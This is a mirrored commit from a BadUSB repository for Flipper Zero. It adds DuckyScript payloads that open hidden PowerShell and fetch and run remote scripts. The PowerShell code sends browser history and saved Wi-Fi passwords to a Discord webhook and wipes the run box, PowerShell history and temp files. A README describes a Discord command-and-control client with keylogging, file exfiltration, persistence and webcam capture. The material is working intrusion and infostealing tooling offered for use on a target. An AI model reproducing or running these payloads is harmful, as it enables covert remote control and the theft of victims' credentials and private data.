gitea-mirror/BadUSB-Files-For-FlipperZero
1
0
Fork 0
mirror of https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git synced 2025-12-05 20:40:14 -08:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
egieb
2023-12-29 15:23:21 +00:00
committed by GitHub
parent c2549dc60e
commit 2efb3d2a2a
98 changed files with 4292 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

19
Beigeworms-Tool-Suite/Beigeworms-Tool-Suite.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's Tool Suite GUI
REM Author: @beigeworm
REM Description: This script Starts a GUI with a huge set of tools.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Beigeworms-Tool-Suite/main.ps1 | iex
ENTER

17
Beigeworms-Tool-Suite/README.md Normal file
View File

@@ -0,0 +1,17 @@
<h2 align="center"> Beigeworm's Toolset GUI </h2>
SYNOPSIS
All useful tools in one place.
A selection of Powershell tools from this repo can be ran from this script.
USAGE
1. Run the script and follow options in the GUI
INFO
Closing this script will NOT close any scripts that were started from this script.
Any background/hidden scripts eg. C2 clients will keep running.

299
Beigeworms-Tool-Suite/main.ps1 Normal file
View File

@@ -0,0 +1,299 @@
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName Microsoft.VisualBasic
[System.Windows.Forms.Application]::EnableVisualStyles()
if ($hookurl.Length -eq 0){$hookurl = "https://discord.com/api/webhooks/..."} # Change this to open GUI with your details
if ($ghurl.Length -eq 0){$ghurl = "https://pastebin.com/raw/......."} # Change this to open GUI with your details
if ($tg.Length -eq 0){$tg = "Ex4mP137eLeGr4m_4pI-B0t_T0k3N"} # Change this to open GUI with your details
if ($NCurl.Length -eq 0){$NCurl = "192.168.0.1"} # Change this to open GUI with your details
$hidewindow = 1
If ($HideWindow -gt 0){
$Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);'
$Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru
$hwnd = (Get-Process -PID $pid).MainWindowHandle
if($hwnd -ne [System.IntPtr]::Zero){
$Type::ShowWindowAsync($hwnd, 0)
}
else{
$Host.UI.RawUI.WindowTitle = 'hideme'
$Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' })
$hwnd = $Proc.MainWindowHandle
$Type::ShowWindowAsync($hwnd, 0)
}
}
$imageUrl = "https://i.ibb.co/ZGrt8qb/b-min.png"
$client = New-Object System.Net.WebClient
$imageBytes = $client.DownloadData($imageUrl)
$ms = New-Object IO.MemoryStream($imageBytes, 0, $imageBytes.Length)
$items = @(
"Telegram C2 Client"
"Discord C2 Client"
"NetCat C2 Client"
"LAN Toolset"
"Encryptor"
"Decryptor"
"Filetype Finder GUI"
"Screen Recorder GUI"
"Network Enumeration GUI"
"Microphone Muter GUI"
"Webhook Spammer GUI"
"Social Search GUI"
"GDI effects GUI"
"Telegram Infoscrape"
"Discord Infoscrape"
"Netcat Screenshare"
"Console MC Server Scanner"
"Console Task Manager"
"Image To Console"
"Matrix Cascade in console"
"Windows 10 Lockscreen"
"Windows 11 Lockscreen"
"Dummy Folder Creator"
"Exfiltrate to USB"
)
$form = New-Object System.Windows.Forms.Form
$form.Text = " | Beigeworms's Toolset |"
$form.Size = New-Object System.Drawing.Size(660,500)
$form.Font = 'Microsoft Sans Serif,10'
$form.BackgroundImage = [System.Drawing.Image]::FromStream($ms, $true)
$form.BackColor = "#242424"
$dropdownHeader = New-Object System.Windows.Forms.Label
$dropdownHeader.Text = "Select Tool Here"
$dropdownHeader.ForeColor = "#bcbcbc"
$dropdownHeader.AutoSize = $true
$dropdownHeader.Width = 25
$dropdownHeader.Height = 10
$dropdownHeader.Location = New-Object System.Drawing.Point(20, 10)
$form.Controls.Add($dropdownHeader)
$dropdown = New-Object System.Windows.Forms.ComboBox
$dropdown.Location = New-Object System.Drawing.Point(20, 30)
$dropdown.Size = New-Object System.Drawing.Size(250, 30)
$dropdown.Items.AddRange($items)
$form.Controls.Add($dropdown)
$WebhookInputHeader = New-Object System.Windows.Forms.Label
$WebhookInputHeader.Text = "Discord Webhook URL"
$WebhookInputHeader.ForeColor = "#bcbcbc"
$WebhookInputHeader.AutoSize = $true
$WebhookInputHeader.Width = 25
$WebhookInputHeader.Height = 10
$WebhookInputHeader.Location = New-Object System.Drawing.Point(20, 60)
$form.Controls.Add($WebhookInputHeader)
$WebhookInput = New-Object System.Windows.Forms.TextBox
$WebhookInput.Text = "$hookurl" # you can set this now for efficiency (optional)
$WebhookInput.Location = New-Object System.Drawing.Point(20, 80)
$WebhookInput.BackColor = "#eeeeee"
$WebhookInput.Width = 600
$WebhookInput.Height = 40
$WebhookInput.Multiline = $false
$form.Controls.Add($WebhookInput)
$TokenInputHeader = New-Object System.Windows.Forms.Label
$TokenInputHeader.Text = "Telegram API Token"
$TokenInputHeader.ForeColor = "#bcbcbc"
$TokenInputHeader.AutoSize = $true
$TokenInputHeader.Width = 25
$TokenInputHeader.Height = 10
$TokenInputHeader.Location = New-Object System.Drawing.Point(20, 110)
$form.Controls.Add($TokenInputHeader)
$TGTokenInput = New-Object System.Windows.Forms.TextBox
$TGTokenInput.Text = "$tg" # you can set this now for efficiency (optional)
$TGTokenInput.Location = New-Object System.Drawing.Point(20, 130)
$TGTokenInput.BackColor = "#eeeeee"
$TGTokenInput.Width = 600
$TGTokenInput.Height = 40
$TGTokenInput.Multiline = $false
$form.Controls.Add($TGTokenInput)
$PastebinInputHeader = New-Object System.Windows.Forms.Label
$PastebinInputHeader.Text = "RAW Pastebin URL"
$PastebinInputHeader.ForeColor = "#bcbcbc"
$PastebinInputHeader.AutoSize = $true
$PastebinInputHeader.Width = 25
$PastebinInputHeader.Height = 10
$PastebinInputHeader.Location = New-Object System.Drawing.Point(20, 160)
$form.Controls.Add($PastebinInputHeader)
$PastebinInput = New-Object System.Windows.Forms.TextBox
$PastebinInput.Text = "$ghurl" # you can set this now for efficiency (optional)
$PastebinInput.Location = New-Object System.Drawing.Point(20, 180)
$PastebinInput.BackColor = "#eeeeee"
$PastebinInput.Width = 600
$PastebinInput.Height = 40
$PastebinInput.Multiline = $false
$form.Controls.Add($PastebinInput)
$NetcatHeader = New-Object System.Windows.Forms.Label
$NetcatHeader.Text = "Netcat IPv4 Address"
$NetcatHeader.ForeColor = "#bcbcbc"
$NetcatHeader.AutoSize = $true
$NetcatHeader.Width = 25
$NetcatHeader.Height = 10
$NetcatHeader.Location = New-Object System.Drawing.Point(20, 210)
$form.Controls.Add($NetcatHeader)
$netcatInput = New-Object System.Windows.Forms.TextBox
$netcatInput.Text = "$NCurl" # you can set this now for efficiency (optional)
$netcatInput.Location = New-Object System.Drawing.Point(20, 230)
$netcatInput.BackColor = "#eeeeee"
$netcatInput.Width = 600
$netcatInput.Height = 40
$netcatInput.Multiline = $false
$form.Controls.Add($netcatInput)
$startButton = New-Object System.Windows.Forms.Button
$startButton.Location = New-Object System.Drawing.Point(540, 30)
$startButton.Size = New-Object System.Drawing.Size(80, 30)
$startButton.Text = "Start"
$startButton.BackColor = "#fff"
$form.Controls.Add($startButton)
$infoButton = New-Object System.Windows.Forms.Button
$infoButton.Location = New-Object System.Drawing.Point(450, 30)
$infoButton.Size = New-Object System.Drawing.Size(80, 30)
$infoButton.Text = "Info"
$infoButton.BackColor = "#fff"
$form.Controls.Add($infoButton)
$hiddenboxtext = New-Object System.Windows.Forms.Label
$hiddenboxtext.Text = "Hidden Console"
$hiddenboxtext.ForeColor = "#bcbcbc"
$hiddenboxtext.AutoSize = $true
$hiddenboxtext.Width = 25
$hiddenboxtext.Height = 10
$hiddenboxtext.Location = New-Object System.Drawing.Point(340, 38)
$form.Controls.Add($hiddenboxtext)
$hiddenbox = New-Object System.Windows.Forms.CheckBox
$hiddenbox.Location = New-Object System.Drawing.Point(325, 35)
$form.Controls.Add($hiddenbox)
$OutputHeader = New-Object System.Windows.Forms.Label
$OutputHeader.Text = "Output"
$OutputHeader.ForeColor = "#bcbcbc"
$OutputHeader.AutoSize = $true
$OutputHeader.Width = 25
$OutputHeader.Height = 10
$OutputHeader.Location = New-Object System.Drawing.Point(20, 260)
$form.Controls.Add($OutputHeader)
$OutputBox = New-Object System.Windows.Forms.TextBox
$OutputBox.Multiline = $True;
$OutputBox.Location = New-Object System.Drawing.Point(20, 280)
$OutputBox.Width = 600
$OutputBox.Height = 150
$OutputBox.Scrollbars = "Vertical"
$form.Controls.Add($OutputBox)
Function Add-OutputBoxLine{
Param ($outfeed)
$OutputBox.AppendText("`r`n$outfeed")
$OutputBox.Refresh()
$OutputBox.ScrollToCaret()
}
$startButton.Add_Click({
$selectedItem = $dropdown.SelectedItem
if($selectedItem.length -eq 0 ){Add-OutputBoxLine -Outfeed "Nothing Selected! Please choose a tool from the dropdown menu.";return}
Add-OutputBoxLine -Outfeed "$selectedItem Selected"
$BaseURL = "https://raw.githubusercontent.com/beigeworm/assets/main/master"
$PoshcryptURL = "https://raw.githubusercontent.com/beigeworm/PoshCryptor/main"
$HideURL = "https://raw.githubusercontent.com/beigeworm/assets/main/master/Hide-Terminal.ps1"
$hookurl = $WebhookInput.Text
$ghurl = $PastebinInput.Text
$tg = $TGTokenInput.Text
$NCurl = $netcatInput.Text
switch ($selectedItem) {
"Telegram C2 Client" {$url = "https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1"}
"Discord C2 Client" {$url = "https://raw.githubusercontent.com/beigeworm/PoshCord-C2/main/Discord-C2-Client.ps1"}
"NetCat C2 Client" {$url = "$BaseURL/NC-Func.ps1"}
"LAN Toolset" {$url = "https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1"}
"Encryptor" {$url = "$PoshcryptURL/Encryption/Encryptor.ps1"}
"Decryptor" {$url = "$PoshcryptURL/Decryption/Decryptor-GUI.ps1"}
"Filetype Finder GUI" {$url = "$BaseURL/Search-Folders-For-Filetypes-GUI.ps1"}
"Screen Recorder GUI" {$url = "$BaseURL/Record-Screen-GUI.ps1"}
"Network Enumeration GUI" {$url = "$BaseURL/Network-Enumeration-GUI.ps1"}
"Microphone Muter GUI" {$url = "$BaseURL/Mute-Microphone-GUI.ps1"}
"Webhook Spammer GUI" {$url = "$BaseURL/Discord-Webhook-Spammer-GUI.ps1"}
"Social Search GUI" {$url = "$BaseURL/Social-Search-GUI.ps1"}
"GDI effects GUI" {$url = "$BaseURL/Desktop-GDI-Efects-GUI.ps1"}
"Telegram Infoscrape" {$url = "$BaseURL/Telegram-InfoStealer.ps1"}
"Discord Infoscrape" {$url = "$BaseURL/Discord-Infostealer.ps1"}
"Netcat Screenshare" {$url = "$BaseURL/Desktop-Screenshare-over-Netcat.ps1"}
"Console MC Server Scanner"{$url = "$BaseURL/Minecraft-Server-Scanner-and-Server-Info.ps1"}
"Console Task Manager" {$url = "$BaseURL/Console-Task-Manager.ps1"}
"Image To Console" {$url = "$BaseURL/Image-to-Console.ps1"}
"Matrix Cascade in console"{$url = "$BaseURL/Matrix-Cascade-in-Powershell.ps1"}
"Windows 10 Lockscreen" {$url = "$BaseURL/Fake-Windows-10-Lockscreen-to-Webhook.ps1"}
"Windows 11 Lockscreen" {$url = "$BaseURL/Fake-Windows-11-Lockscreen-to-Webhook.ps1"}
"Dummy Folder Creator" {$url = "$BaseURL/Dummy-Folder-Creator.ps1"}
"Exfiltrate to USB"{$url = "$BaseURL/ExfiltrateToUSB.ps1"}
}
Add-OutputBoxLine -Outfeed "$selectedItem URL : $url"
if(($hiddenbox.Checked) -and ($selectedItem -notlike "*Console*") -and ($selectedItem -notlike "*LAN*")){
Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -W Hidden -C irm $HideURL | iex ; `$tg = `'$tg`' ;`$hookurl = `'$hookurl`' ; `$ghurl = `'$ghurl`' ; `$NCurl = `'$NCurl`' ; irm $url | iex")
Add-OutputBoxLine -Outfeed "Started $selectedItem With Console Hidden"
}
else{
Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -C `$stage = `'y`' ; `$tg = `'$tg`' ;`$hookurl = `'$hookurl`' ; `$ghurl = `'$ghurl`' ; `$NCurl = `'$NCurl`' ; irm $url | iex")
Add-OutputBoxLine -Outfeed "Started $selectedItem With Console Visible"
}
})
$infoButton.Add_Click({
$OutputBox.Clear()
$selectedItem = $dropdown.SelectedItem
if($selectedItem.length -eq 0 ){Add-OutputBoxLine -Outfeed "Nothing Selected! Please choose a tool from the dropdown menu.";return}
Add-OutputBoxLine -Outfeed "$selectedItem Information/Help"
Add-OutputBoxLine -Outfeed "=================================================================================="
$BaseURL = "https://raw.githubusercontent.com/beigeworm/assets/main/master"
$PoshcryptURL = "https://raw.githubusercontent.com/beigeworm/PoshCryptor/main"
switch ($selectedItem) {
"Telegram C2 Client" {$url = "https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1"}
"Discord C2 Client" {$url = "https://raw.githubusercontent.com/beigeworm/PoshCord-C2/main/Discord-C2-Client.ps1"}
"NetCat C2 Client" {$url = "$BaseURL/NC-Func.ps1"}
"LAN Toolset" {$url = "https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1"}
"Encryptor" {$url = "$PoshcryptURL/Encryption/Encryptor.ps1"}
"Decryptor" {$url = "$PoshcryptURL/Decryption/Decryptor-GUI.ps1"}
"Filetype Finder GUI" {$url = "$BaseURL/Search-Folders-For-Filetypes-GUI.ps1"}
"Screen Recorder GUI" {$url = "$BaseURL/Record-Screen-GUI.ps1"}
"Network Enumeration GUI" {$url = "$BaseURL/Network-Enumeration-GUI.ps1"}
"Microphone Muter GUI" {$url = "$BaseURL/Mute-Microphone-GUI.ps1"}
"Webhook Spammer GUI" {$url = "$BaseURL/Discord-Webhook-Spammer-GUI.ps1"}
"Social Search GUI" {$url = "$BaseURL/Social-Search-GUI.ps1"}
"GDI effects GUI" {$url = "$BaseURL/Desktop-GDI-Efects-GUI.ps1"}
"Telegram Infoscrape" {$url = "$BaseURL/Telegram-InfoStealer.ps1"}
"Discord Infoscrape" {$url = "$BaseURL/Discord-Infostealer.ps1"}
"Netcat Screenshare" {$url = "$BaseURL/Desktop-Screenshare-over-Netcat.ps1"}
"Console MC Server Scanner"{$url = "$BaseURL/Minecraft-Server-Scanner-and-Server-Info.ps1"}
"Console Task Manager" {$url = "$BaseURL/Console-Task-Manager.ps1"}
"Image To Console" {$url = "$BaseURL/Image-to-Console.ps1"}
"Matrix Cascade in console"{$url = "$BaseURL/Matrix-Cascade-in-Powershell.ps1"}
"Windows 10 Lockscreen" {$url = "$BaseURL/Fake-Windows-10-Lockscreen-to-Webhook.ps1"}
"Windows 11 Lockscreen" {$url = "$BaseURL/Fake-Windows-11-Lockscreen-to-Webhook.ps1"}
"Dummy Folder Creator" {$url = "$BaseURL/Dummy-Folder-Creator.ps1"}
"Exfiltrate to USB"{$url = "$BaseURL/ExfiltrateToUSB.ps1"}
}
$fileContent = Invoke-RestMethod -Uri $Url
$pattern = '(?s)<#(.*?)#>'
$matches = [regex]::Matches($fileContent, $pattern)
foreach ($match in $matches) {
$textInsideHashTags = $match.Groups[1].Value
Add-OutputBoxLine -Outfeed $textInsideHashTags
}
Add-OutputBoxLine -Outfeed "=================================================================================="
Add-OutputBoxLine -Outfeed "$selectedItem URL : $url"
})
[Windows.Forms.Application]::Run($form)

19
Browser-History-to-Discord/Browser-History-to-Discord.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's browser history to Discord Webhook.
REM Author: @beigeworm
REM Description: This script collects browser history and posts results to a discord webhook.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_bh_to_dc | iex
ENTER

11
Browser-History-to-Discord/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Browser History and Bookmarks to Discord </h2>
SYNOPSIS
Gathers History and Bookmarks data from database files and sends it to discord
USAGE
1. Replace YOUR_WEBHOOK_HERE with your Discord webhook.
2. Run the script and check Discord for results.

44
Browser-History-to-Discord/main.ps1 Normal file
View File

@@ -0,0 +1,44 @@

$whuri = "$dc"
$outpath = "$env:temp\history.txt"
"Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII
# Define the Regular expression for extracting history and bookmarks
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
# Define paths for data storage
$Paths = @{
'chrome_history' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"
'chrome_bookmarks' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
'edge_history' = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"
'edge_bookmarks' = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks"
'firefox_history' = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"
'opera_history' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History"
'opera_bookmarks' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks"
}
# Define browsers and data
$Browsers = @('chrome', 'edge', 'firefox', 'opera')
$DataValues = @('history', 'bookmarks')
foreach ($Browser in $Browsers) {
foreach ($DataValue in $DataValues) {
$PathKey = "${Browser}_${DataValue}"
$Path = $Paths[$PathKey]
$Value = Get-Content -Path $Path | Select-String -AllMatches $regex | % {($_.Matches).Value} | Sort -Unique
$Value | ForEach-Object {
[PSCustomObject]@{
Browser = $Browser
DataType = $DataValue
Content = $_
}
} | Out-File -FilePath $outpath -Append
}
}
curl.exe -F file1=@"$outPath" $whuri | Out-Null
sleep 2
Remove-Item -Path $outPath -force

19
Clean-History/Clean-History.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: History Cleaner
REM Author: @beigeworm
REM Description: This script empties the temp folder and recycle bin, clear run box and powershell history
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Clean-History/main.ps1 | iex
ENTER

13
Clean-History/README.md Normal file
View File

@@ -0,0 +1,13 @@
<h2 align="center"> History Cleaner </h2>
SYNOPSIS
Empty the temp folder and recycle bin, clear run box and powershell history.
USAGE
1. Run the script
CREDIT
this code was pulled from I-Am-Jakoby's recon script.
#>

15
Clean-History/main.ps1 Normal file
View File

@@ -0,0 +1,15 @@
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

16
Computer-Acid/Computer-ACID-Prank.txt Normal file
View File

@@ -0,0 +1,16 @@
REM Title: beigeworm's GDI Effects Prank.
REM Author: @beigeworm
REM Description: This script uses GDI effects on the users display to create visual effects for 90 seconds.
REM Target: Windows 10
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Computer-Acid/main.ps1 | iex
ENTER

11
Computer-Acid/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Computer Acid Prank </h2>
SYNOPSIS
this script generates GDI effects (VISUAL EFFECTS) on the desktop
(lasts for 90 seconds before returning to normal)
USAGE
1. Run script with powershell

49
Computer-Acid/main.ps1 Normal file
View File

File diff suppressed because one or more lines are too long

27
Discord-C2/Discord C2 Client.txt Normal file
View File

@@ -0,0 +1,27 @@
REM Title: beigeworm's Discord Command And Control.
REM Author: @beigeworm
REM Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform.
REM Target: Windows 10 and 11
REM SETUP
REM Goto https://pastebin.com and make an account..
REM Create an empty paste/file and copy the RAW url.
REM Change PASTEBIN_URL_HERE to the RAW url eg. https://pastebin.com/raw/QeCLTdea -OR- http://your.server.ip.here/files/file.txt
REM Change WEBHOOK_HERE to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx
REM for more info goto - https://github.com/beigeworm/PoshCord-C2
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H
ENTER
DELAY 5000
STRING $hookurl = 'WEBHOOK_HERE'; $ghurl = 'PASTEBIN_URL_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshCord-C2/main/Discord-C2-Client.ps1 | iex
ENTER

62
Discord-C2/README.md Normal file
View File

@@ -0,0 +1,62 @@
# PoshCord-C2
MAIN SCRIPT HERE - https://github.com/beigeworm/PoshCord-C2
**SYNOPSIS**
Using a Discord webhook and a hosted text file to Act as a Command and Control Platform.
**INFORMATION**
This script will wait until it notices a change in the contents of a text file hosted online (eg. github/pastebin).
Every 10 seconds it will check a file for a change in the file contents and interpret it as a custom command / module.
*Using github to host your command file will take up to 5 minutes to run each module command - Use pastebin (account needed) OR your own server to host the txt file for instant response*
**SETUP**
1. Goto https://pastebin.com and make an account..
2. Create an empty paste/file and copy the RAW url.
3. Change YOUR_FILE_URL to the RAW url eg. https://pastebin.com/QeCLTdea -OR- http://your.server.ip.here/files/file.txt
4. Change YOUR_WEBHOOK_URL to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx
**USAGE**
1. Setup the script
2. Run the script on a target.
3. Check discord for 'waiting to connect..' message.
4. Edit the contents of your hosted file to contain 'options' to get a list of modules
5. Do the same with any other command listed - To run that module.
**MODULES**
1. `Message` : Send a message window to the Users desktop.
2. `SpeechToText` : Send microphone audio transcript to Discord
3. `Screenshot` : Sends a screenshot of the desktop to Discord.
4. `KeyCapture` : Capture Keystrokes and send to Discord. (see ExtraInfo for usage.)
5. `Exfiltrate` : Send various files to Discord zipped in 25mb files. (see ExtraInfo for usage.)
6. `Upload` : Upload a file to Discord. (see ExtraInfo for usage.)
7. `Systeminfo` : Send System information as text file to Discord. (takes a few minutes to gather data)
8. `RecordAudio` : Record microphone to Discord (RecordAudio -t 100) in seconds
9. `RecordScreen` : Record Screen to Discord (RecordScreen -t 100) in seconds
10. `TakePicture` : Send a webcam picture to Discord. (can take a few minutes..)
11. `FolderTree` : Save folder trees to file and send to Discord.
12. `FakeUpdate` : Spoof windows update screen.
13. `Nearby-Wifi` : Show nearby wifi networks
14. `Send-Hydra` : Never ending popups (use killswitch)
15. `AddPersistance` : Add this script to the startup folder.
16. `RemovePersistance` : Remove this script from the startup folder.
17. `IsAdmin` : Check if the session is admin.
18. `AttemptElevate` : Attempt to restart script as admin. (displays a UAC prompt to User)
19. `EnumerateLAN` : Show all devices on the network (see ExtraInfo for usage.) (can take a few miniutes to complete)
20. `Close` : Close this Session
21. `Options` : Show the Module menu
22. `ExtraInfo` : Show extra Module information
**FEATURES**
**Custom Scripting**
Edit the hosted file contents to any custom powershell script or command to run custom powershell.
**Killswitch**
Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands.

11
Discord-Infostealer/README.md Normal file
View File

@@ -0,0 +1,11 @@
<h2 align="center"> Discord System InfoStealer </h2>
SYNOPSIS
This script gathers system information and posts to Discord Webhook with the results.
SETUP INSTRUCTIONS
4. Replace DISCORD_WEBHOOK with your webhook
5. Run Script on target System

19
Discord-Infostealer/System-Info-to-Discord.txt Normal file
View File

@@ -0,0 +1,19 @@
REM Title: beigeworm's system information to discord webhook
REM Author: @beigeworm
REM Description: This script gathers system information and posts to a discord webhook address with the results.
REM Target: Windows 10
REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_info_to_dc | iex
ENTER

92
Discord-Infostealer/main.ps1 Normal file
View File

@@ -0,0 +1,92 @@
$hookurl = "$dc"
$userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("")
$email = (Get-ComputerInfo).WindowsRegisteredOwner
$systemLocale = Get-WinSystemLocale;$systemLanguage = $systemLocale.Name
$userLanguageList = Get-WinUserLanguageList;$keyboardLayoutID = $userLanguageList[0].InputMethodTips[0]
$ver = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').DisplayVersion
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
$outssid="";$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+";foreach($s in $ws){
if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "<None>" -And $s.length -gt 5){$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()}
$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None";foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$outssid+="SSID: $ssid : Password: $pass`n"}}}$a++;}
$systemInfo = Get-WmiObject -Class Win32_OperatingSystem
$processorInfo = Get-WmiObject -Class Win32_Processor
$computerSystemInfo = Get-WmiObject -Class Win32_ComputerSystem
$userInfo = Get-WmiObject -Class Win32_UserAccount
$videocardinfo = Get-WmiObject Win32_VideoController
$Hddinfo = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, FileSystem,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,FileSystem,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } ;$Hddinfo=($Hddinfo| Out-String) ;$Hddinfo = ("$Hddinfo").TrimEnd("")
$RamInfo = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$users = "$($userInfo.Name)"
$userString = "`nFull Name : $($userInfo.FullName)"
$OSString = "$($systemInfo.Caption) $($systemInfo.OSArchitecture)"
$systemString = "Processor : $($processorInfo.Name)"
$systemString += "`nMemory : $RamInfo"
$systemString += "`nGpu : $($videocardinfo.Name)"
$systemString += "`nStorage : $Hddinfo"
$infomessage = "``========================================================
Current User : $env:USERNAME
Email Address : $email
Language : $systemLanguage
Keyboard Layout : $keyboardLayoutID
Other Accounts : $users
Public IP : $computerPubIP
Current OS : $OSString
Build : $ver
Hardware Info
--------------------------------------------------------
$systemString``"
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table
$process=Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine
$service=Get-CimInstance -ClassName Win32_Service | select State,Name,StartName,PathName | Where-Object {$_.State -like 'Running'}
$software=Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize
$drivers=Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion
$Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"
$Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {$Key = $_;if ($Key -match $Search){New-Object -TypeName PSObject -Property @{User = $env:UserName;Browser = 'chrome';DataType = 'history';Data = $_}}}
$Regex2 = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?';$Pathed = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"
$Value2 = Get-Content -Path $Pathed | Select-String -AllMatches $regex2 |% {($_.Matches).Value} |Sort -Unique
